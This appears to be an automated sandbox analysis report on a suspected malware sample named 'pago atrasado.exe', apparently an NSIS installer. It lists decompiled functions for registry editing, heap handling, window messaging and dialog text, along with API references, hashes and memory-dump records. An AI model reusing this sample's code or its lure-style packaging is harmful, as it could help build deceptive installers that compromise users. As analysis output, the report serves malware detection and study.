                                            • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402374
                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsw7E57.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402394
                                            • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsw7E57.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023CD
                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsw7E57.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004024B0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CloseCreateValuelstrlen
                                            • String ID: C:\Users\user\AppData\Local\Temp\nsw7E57.tmp
                                            • API String ID: 1356686001-1192040905
                                            • Opcode ID: 9bf654010a188213ed9da3fb996897beb0b6485406045e6761b6e0bfc6b57b1d
                                            • Instruction ID: e6eb4e552242eddf296ff96e6d07a7eb6613d299afeb9756830ee7ce8f9eb162
                                            • Opcode Fuzzy Hash: 9bf654010a188213ed9da3fb996897beb0b6485406045e6761b6e0bfc6b57b1d
                                            • Instruction Fuzzy Hash: 7111A271E00108BFEB10EFA5DE8DEAF7678EB40758F10443AF505B31D0C6B85D419A69
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 1000D05A, Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 96%
                                            			E1000D05A(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					__eflags = _t31;
					if(_t31 != 0) {
						_push(__ebx);
						while(1) {
							__eflags = _t31 - 0xffffffe0;
							if(_t31 > 0xffffffe0) {
								break;
							}
							__eflags = _t31;
							if(_t31 == 0) {
								_t31 = _t31 + 1;
								__eflags = _t31;
							}
							_t7 = HeapReAlloc( *0x1001daa0, 0, _a4, _t31);
							_t20 = _t7;
							__eflags = _t20;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								__eflags =  *0x1001da9c - _t7;
								if(__eflags == 0) {
									_t9 = E1000982A(__eflags);
									 *_t9 = E10009871(GetLastError());
									goto L17;
								} else {
									__eflags = E100097F7(_t7, _t31);
									if(__eflags == 0) {
										_t12 = E1000982A(__eflags);
										 *_t12 = E10009871(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E100097F7(_t6, _t31);
						 *((intOrPtr*)(E1000982A(__eflags))) = 0xc;
						goto L12;
					} else {
						E1000A31A(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E1000590F(__ebx, __edx, __edi, _a8);
				}
			}









                                            0x1000d061
                                            0x1000d06f
                                            0x1000d072
                                            0x1000d074
                                            0x1000d083
                                            0x1000d0b6
                                            0x1000d0b6
                                            0x1000d0b9
                                            0x00000000
                                            0x00000000
                                            0x1000d086
                                            0x1000d088
                                            0x1000d08a
                                            0x1000d08a
                                            0x1000d08a
                                            0x1000d097
                                            0x1000d09d
                                            0x1000d09f
                                            0x1000d0a1
                                            0x1000d101
                                            0x1000d101
                                            0x1000d0a3
                                            0x1000d0a3
                                            0x1000d0a9
                                            0x1000d0eb
                                            0x1000d0ff
                                            0x00000000
                                            0x1000d0ab
                                            0x1000d0b2
                                            0x1000d0b4
                                            0x1000d0d3
                                            0x1000d0e7
                                            0x1000d0cd
                                            0x1000d0cd
                                            0x1000d0cd
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x1000d0b4
                                            0x1000d0a9
                                            0x00000000
                                            0x1000d0cf
                                            0x1000d0bc
                                            0x1000d0c7
                                            0x00000000
                                            0x1000d076
                                            0x1000d079
                                            0x1000d07f
                                            0x1000d07f
                                            0x1000d0d0
                                            0x1000d0d2
                                            0x1000d063
                                            0x1000d06d
                                            0x1000d06d

                                            APIs
                                            • _malloc.LIBCMT ref: 1000D066
                                              • Part of subcall function 1000590F: __FF_MSGBANNER.LIBCMT ref: 10005926
                                              • Part of subcall function 1000590F: __NMSG_WRITE.LIBCMT ref: 1000592D
                                              • Part of subcall function 1000590F: RtlAllocateHeap.NTDLL(00630000,00000000,00000001,?,?,?,?,10003D2C), ref: 10005952
                                            • _free.LIBCMT ref: 1000D079
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AllocateHeap_free_malloc
                                            • String ID:
                                            • API String ID: 1020059152-0
                                            • Opcode ID: 300eb232fee5ff746ea73558d6903992b3e2d68afa41119a1f30a19ee69866a0
                                            • Instruction ID: aae015efdbdb643356a7341ef58f28c8c27676f56bc8a1864c705a4957f3fa6b
                                            • Opcode Fuzzy Hash: 300eb232fee5ff746ea73558d6903992b3e2d68afa41119a1f30a19ee69866a0
                                            • Instruction Fuzzy Hash: 6711A336908226ABFB24FF74AC5574E37D4EF022E0F118527F84C9A198DF31D98297A0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00402A69, Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 84%
                                            			E00402A69(void* _a4, char* _a8, long _a12) {
				void* _v8;
				char _v272;
				signed char _t16;
				long _t18;
				long _t25;
				intOrPtr* _t27;
				long _t28;

				_t16 =  *0x423ff0; // 0x0
				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						__eflags = _a12;
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							__eflags = 1;
							return 1;
						}
						_t25 = E00402A69(_v8,  &_v272, 0);
						__eflags = _t25;
						if(_t25 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405F28(4);
					if(_t27 == 0) {
						__eflags =  *0x423ff0; // 0x0
						if(__eflags != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						__eflags = _t28;
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x423ff0, 0);
				}
				return _t18;
			}










                                            0x00402a79
                                            0x00402a8a
                                            0x00402a92
                                            0x00402aba
                                            0x00402aa1
                                            0x00402aa4
                                            0x00402af4
                                            0x00402afa
                                            0x00402afc
                                            0x00000000
                                            0x00402afc
                                            0x00402ab1
                                            0x00402ab6
                                            0x00402ab8
                                            0x00000000
                                            0x00000000
                                            0x00402ab8
                                            0x00402acf
                                            0x00402ad7
                                            0x00402ade
                                            0x00402b04
                                            0x00402b0a
                                            0x00000000
                                            0x00000000
                                            0x00402b12
                                            0x00402b18
                                            0x00402b1a
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00402b1a
                                            0x00000000
                                            0x00402aed
                                            0x00402b01

                                            APIs
                                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A8A
                                            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AC6
                                            • RegCloseKey.ADVAPI32(?), ref: 00402ACF
                                            • RegCloseKey.ADVAPI32(?), ref: 00402AF4
                                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B12
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Close$DeleteEnumOpen
                                            • String ID:
                                            • API String ID: 1912718029-0
                                            • Opcode ID: 5d0b6e0ce49e1b9a68b8278243b858d166325889e329a7d8d46ece79ca10f327
                                            • Instruction ID: fd754328231b90d3809392cacc3778cc58b9849b8c5c25df110c081a09ace752
                                            • Opcode Fuzzy Hash: 5d0b6e0ce49e1b9a68b8278243b858d166325889e329a7d8d46ece79ca10f327
                                            • Instruction Fuzzy Hash: 29116D71A0000AFEDF219F90DE49DAE3B79FB14345B104076FA05A00E0DBB89E51AFA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00401CDE, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00401CDE(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8), __edx);
				GetClientRect(_t25, _t27 - 0x50);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A29(_t21), _t21,  *(_t27 - 0x48) *  *(_t27 - 0x20),  *(_t27 - 0x44) *  *(_t27 - 0x20), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                            0x00401ce8
                                            0x00401cef
                                            0x00401d1e
                                            0x00401d26
                                            0x00401d2d
                                            0x00401d2d
                                            0x004028c1
                                            0x004028cd

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                            • String ID:
                                            • API String ID: 1849352358-0
                                            • Opcode ID: b6dc52a7f50dc5a5b8d69a970bc0364d2e288b966cb10631b9234e7e7e1bdde9
                                            • Instruction ID: 6b5de524c76fb4cd20547a313357388a8ed9b6ad8842e2156e420fd608a0a23d
                                            • Opcode Fuzzy Hash: b6dc52a7f50dc5a5b8d69a970bc0364d2e288b966cb10631b9234e7e7e1bdde9
                                            • Instruction Fuzzy Hash: 75F0EC72A04118AFD701EBA4DE88DAFB77CFB44305B14443AF501F6190C7749D019B79
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00404649, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 77%
                                            			E00404649(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E00405BBA(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E00405BBA(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E00405BBA(_t41, _t47, 0x420538, 0x420538, _a8);
				wsprintfA(_t32 + lstrlenA(0x420538), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x423718, _a4, 0x420538);
			}



















                                            0x0040464f
                                            0x00404654
                                            0x0040465c
                                            0x0040465d
                                            0x0040466a
                                            0x00404672
                                            0x00404673
                                            0x00404675
                                            0x00404677
                                            0x00404679
                                            0x0040467c
                                            0x0040467c
                                            0x00404683
                                            0x00404689
                                            0x00404689
                                            0x00404690
                                            0x00404697
                                            0x0040469a
                                            0x0040469d
                                            0x0040469d
                                            0x004046a1
                                            0x004046b1
                                            0x004046b3
                                            0x004046b6
                                            0x0040465f
                                            0x0040465f
                                            0x00404666
                                            0x00404666
                                            0x004046be
                                            0x004046c9
                                            0x004046df
                                            0x004046ef
                                            0x0040470b

                                            APIs
                                            • lstrlenA.KERNEL32(00420538,00420538,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404564,000000DF,00000000,00000400,?), ref: 004046E7
                                            • wsprintfA.USER32 ref: 004046EF
                                            • SetDlgItemTextA.USER32 ref: 00404702
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ItemTextlstrlenwsprintf
                                            • String ID: %u.%u%s%s
                                            • API String ID: 3540041739-3551169577
                                            • Opcode ID: 9ec326ac30901ad515aaf80f2404a58f9bab4133aba90e091d0e9c932beca6f7
                                            • Instruction ID: 33c490f36d39f428f4b6feb88c055206d8f5fbd89635bf607d329e374d543c8d
                                            • Opcode Fuzzy Hash: 9ec326ac30901ad515aaf80f2404a58f9bab4133aba90e091d0e9c932beca6f7
                                            • Instruction Fuzzy Hash: 5A11D873A0512437EB0065699C41EAF329CDB82335F150637FE26F31D1E9B9DD1145E8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 10004140, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 78COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 37%
                                            			E10004140(void* __ebx, void* __edi, char* _a4) {
				signed int _v8;
				signed int _v12;
				char _v13;
				void* _v14;
				signed int _v20;
				intOrPtr _v24;
				char* _v28;
				signed char _t50;
				char* _t54;
				char* _t71;
				char* _t76;
				signed int _t82;
				char** _t90;

				_v8 = 0;
				_v12 = 0;
				_t71 = _a4;
				_t92 =  *(_t71 + 0x18) & 0x0000000f;
				_t82 = 1;
				_v13 = 1;
				if(( *(_t71 + 0x18) & 0x0000000f) != 0) {
					 *_t90 = L"(dec->bit_pos & 0xF) == 0";
					_v28 = L"Source.c";
					_v24 = 0xaa;
					E10005287(__ebx, 1, __edi, _t92);
					_v13 = 0;
				}
				while(_a4[0x18] != 0) {
					_a4[0x18] = _a4[0x18] - 0x10;
					_v8 = (_a4[0x14] >> _a4[0x18] & 0x0000ffff) << _v12 | _v8;
					_v12 = _v12 + 0x10;
				}
				while(1) {
					__eflags = _v12 - 0x20;
					_v14 = 0;
					if(_v12 < 0x20) {
						_t54 = _a4;
						_t76 = _a4;
						__eflags =  *((intOrPtr*)(_t54 + 4)) + 2 -  *((intOrPtr*)(_t76 + 8));
						_t32 =  *((intOrPtr*)(_t54 + 4)) + 2 -  *((intOrPtr*)(_t76 + 8)) < 0;
						__eflags = _t32;
						_v14 = _t82 & 0xffffff00 | _t32;
					}
					_t50 = _v14;
					__eflags = _t50 & 0x00000001;
					if((_t50 & 0x00000001) == 0) {
						break;
					}
					 *_t90 = _a4;
					_v20 = E10004020() & 0x0000ffff;
					_v8 = _v20 << _v12 | _v8;
					_t82 = _v12 + 0x10;
					_v12 = _t82;
				}
				return _v8;
			}
















                                            0x10004149
                                            0x10004150
                                            0x10004157
                                            0x10004160
                                            0x10004163
                                            0x10004165
                                            0x10004168
                                            0x10004174
                                            0x1000417d
                                            0x10004181
                                            0x10004189
                                            0x10004190
                                            0x10004190
                                            0x10004196
                                            0x100041ac
                                            0x100041ca
                                            0x100041d3
                                            0x100041d3
                                            0x100041e0
                                            0x100041e2
                                            0x100041e6
                                            0x100041e9
                                            0x100041ef
                                            0x100041f8
                                            0x100041fb
                                            0x100041fe
                                            0x100041fe
                                            0x10004201
                                            0x10004201
                                            0x10004204
                                            0x10004207
                                            0x10004209
                                            0x00000000
                                            0x00000000
                                            0x10004217
                                            0x10004225
                                            0x10004232
                                            0x10004238
                                            0x1000423b
                                            0x1000423b
                                            0x1000424a

                                            APIs
                                            • __wassert.LIBCMT ref: 10004189
                                              • Part of subcall function 10005287: GetModuleHandleExW.KERNEL32(00000006,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000534C
                                              • Part of subcall function 10005287: GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,?,?,?,?,?,00000000), ref: 10005378
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Module$FileHandleName__wassert
                                            • String ID: $(dec->bit_pos & 0xF) == 0$Source.c
                                            • API String ID: 1832359313-2493867184
                                            • Opcode ID: cef82a7ac4badff057b50e5a51ff0f5bf28fb44a8569e50c435aa979c4707036
                                            • Instruction ID: 3d9d7b110c4f8f0c8c02d5fef138159b8475e2a573a6972cdbb6502390cc2c17
                                            • Opcode Fuzzy Hash: cef82a7ac4badff057b50e5a51ff0f5bf28fb44a8569e50c435aa979c4707036
                                            • Instruction Fuzzy Hash: 45313C74A04248EFDB04DF98C090A9DBBF1EF58380F25849DE8859B346D731EA85DB95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00401BCA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 51%
                                            			E00401BCA() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 8) = E00402A0C(3);
				 *(_t55 + 8) = E00402A0C(4);
				if(( *(_t55 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402A29(0x33);
				}
				__eflags =  *(_t55 - 0x14) & 0x00000002;
				if(( *(_t55 - 0x14) & 0x00000002) != 0) {
					 *(_t55 + 8) = E00402A29(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E00402A29();
					_t28 = E00402A29();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 8),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E00402A0C();
					_t37 = E00402A0C();
					_t48 =  *(_t55 - 0x14) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8));
						L10:
						 *(_t55 - 0xc) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8), _t42, _t48, _t55 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x28)) >= _t42) {
					_push( *(_t55 - 0xc));
					E00405AF6();
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                                            0x00401bd3
                                            0x00401bdf
                                            0x00401be2
                                            0x00401beb
                                            0x00401beb
                                            0x00401bee
                                            0x00401bf2
                                            0x00401bfb
                                            0x00401bfb
                                            0x00401bfe
                                            0x00401c02
                                            0x00401c04
                                            0x00401c51
                                            0x00401c53
                                            0x00401c5c
                                            0x00401c64
                                            0x00401c67
                                            0x00401c67
                                            0x00401c70
                                            0x00000000
                                            0x00401c06
                                            0x00401c0d
                                            0x00401c0f
                                            0x00401c17
                                            0x00401c1a
                                            0x00401c42
                                            0x00401c76
                                            0x00401c76
                                            0x00401c1c
                                            0x00401c2a
                                            0x00401c32
                                            0x00401c35
                                            0x00401c35
                                            0x00401c1a
                                            0x00401c79
                                            0x00401c7c
                                            0x00401c82
                                            0x00402866
                                            0x00402866
                                            0x004028c1
                                            0x004028cd

                                            APIs
                                            • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                            • SendMessageA.USER32 ref: 00401C42
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: MessageSend$Timeout
                                            • String ID: !
                                            • API String ID: 1777923405-2657877971
                                            • Opcode ID: 5e155985e8b695c365f3075347fc5cad64183b83899d6bbba3f89d2116927a25
                                            • Instruction ID: 8eb34b9659dedbc099cc11ce9bc18cab6bc834bdcc036981f8d30f042af137bc
                                            • Opcode Fuzzy Hash: 5e155985e8b695c365f3075347fc5cad64183b83899d6bbba3f89d2116927a25
                                            • Instruction Fuzzy Hash: C621A171A44149BEEF02AFF4C94AAEE7B75EF44704F10407EF501BA1D1DAB88A40DB29
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004038B4, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E004038B4(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				intOrPtr _t15;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405B0F(__ecx, "1033");
				while(1) {
					_t26 =  *0x423f84; // 0x1
					if(_t26 == 0) {
						goto L7;
					}
					_t15 =  *0x423f50; // 0x661638
					_t16 =  *(_t15 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423f80;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423720 = _t18[1];
					 *0x423fe8 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42371c = _t23;
						E00405AF6(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420510, E00405BBA(_t13, _t24, _t26, "cuflzcqvvfgho Setup", 0xfffffffe));
						_t11 =  *0x423f6c; // 0x2
						_t27 =  *0x423f68; // 0x6617e4
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t5 = _t27 + 0x18; // 0x6617fc
								_t11 = E00405BBA(_t13, _t25, _t27, _t5, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

















                                            0x004038b8
                                            0x004038bd
                                            0x004038c3
                                            0x004038c8
                                            0x004038c8
                                            0x004038d0
                                            0x00000000
                                            0x00000000
                                            0x004038d2
                                            0x004038d8
                                            0x004038e0
                                            0x004038e2
                                            0x004038e8
                                            0x004038e8
                                            0x004038ea
                                            0x004038f6
                                            0x00000000
                                            0x00000000
                                            0x004038fa
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004038fc
                                            0x00403901
                                            0x0040390a
                                            0x00403910
                                            0x00403915
                                            0x00403929
                                            0x00403934
                                            0x0040394c
                                            0x00403952
                                            0x00403957
                                            0x0040395f
                                            0x00403980
                                            0x00403980
                                            0x00403980
                                            0x00403961
                                            0x00403963
                                            0x00403963
                                            0x00403967
                                            0x0040396a
                                            0x0040396e
                                            0x0040396e
                                            0x00403973
                                            0x00403979
                                            0x00403979
                                            0x00000000
                                            0x00403963
                                            0x00403917
                                            0x0040391c
                                            0x00403925
                                            0x0040391e
                                            0x0040391e
                                            0x0040391e
                                            0x0040391c

                                            APIs
                                            • SetWindowTextA.USER32(00000000,cuflzcqvvfgho Setup), ref: 0040394C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: TextWindow
                                            • String ID: "C:\Users\user\Desktop\pago atrasado.exe" $1033$cuflzcqvvfgho Setup
                                            • API String ID: 530164218-3358065705
                                            • Opcode ID: efc42492ee7b8a51a3ec7fa34d8682ca64c79934ee229eb602048578ff3af0eb
                                            • Instruction ID: 9405f6c8d043b7fcf606726b90d8bdb5e10644d2b1bbff0bcd5da451eaf68503
                                            • Opcode Fuzzy Hash: efc42492ee7b8a51a3ec7fa34d8682ca64c79934ee229eb602048578ff3af0eb
                                            • Instruction Fuzzy Hash: D211CFB1F006119BC7349F15E88093777BDEB89716369817FE801A73E0D67DAE029A98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 10008661, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 16%
                                            			E10008661(void* __ecx, intOrPtr _a4) {
				struct HINSTANCE__* _v8;
				_Unknown_base(*)()* _t4;

				_t4 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t4, __ecx);
				if(_t4 != 0) {
					_t4 = GetProcAddress(_v8, "CorExitProcess");
					if(_t4 != 0) {
						return  *_t4(_a4);
					}
				}
				return _t4;
			}





                                            0x10008665
                                            0x10008670
                                            0x10008678
                                            0x10008682
                                            0x1000868a
                                            0x00000000
                                            0x1000868f
                                            0x1000868a
                                            0x10008694

                                            APIs
                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,10003D2C,?,?,10008656,?,?,10009F7C,000000FF,0000001E,10019110,00000008,10009F1F,?,?), ref: 10008670
